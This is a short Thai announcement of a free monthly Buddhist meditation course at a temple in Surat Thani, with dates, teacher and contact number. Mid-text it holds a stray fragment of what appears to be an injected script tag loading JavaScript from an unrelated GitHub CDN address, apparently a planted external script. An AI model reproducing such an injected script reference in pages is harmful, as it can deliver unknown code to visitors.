หลักสูตร “ดวงตาเห็นธรรม”

 bette  

ศููนย์โลกุตรธรรมแห่งประเทศไทย สาขาสุราษฎร์ธานี วัดถ้ำบ่อน้ำทิพย์ สามแยกพระพุทธบาท ต.ท่าอุแท อ.กาญจนดิษฐ์ จ.สุราษฎร์ธานี เปิดอบรมโลกุตรธรรม หลักสูตร “ดวงตาเห็นธรรม” ในวันที่ ๑-๑๐ ของทุกเดือน โดยพระอาจารย์เมธา ชาตเมโธ ประธานศูนย์ฯ รับสมัครผู้เข้าอบรมพระภิกษุอุบาสกอุบาสิกา ไม่เกิน ๓๐ ท่าน แต่งกายชุดขาว ไม่ต้องเสียค่าใช้จ่ายใดๆ ติดต่อ โทร.๐๘-๑๔๗๖-๑๔๕๕  https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   

ที่มา : ศููนย์โลกุตรธรรมแห่งประเทศไทย สาขาสุราษฎร์ธานี

3,641


Ralated Storyจีรัง กรุ๊ป    

 ธรรมะไทย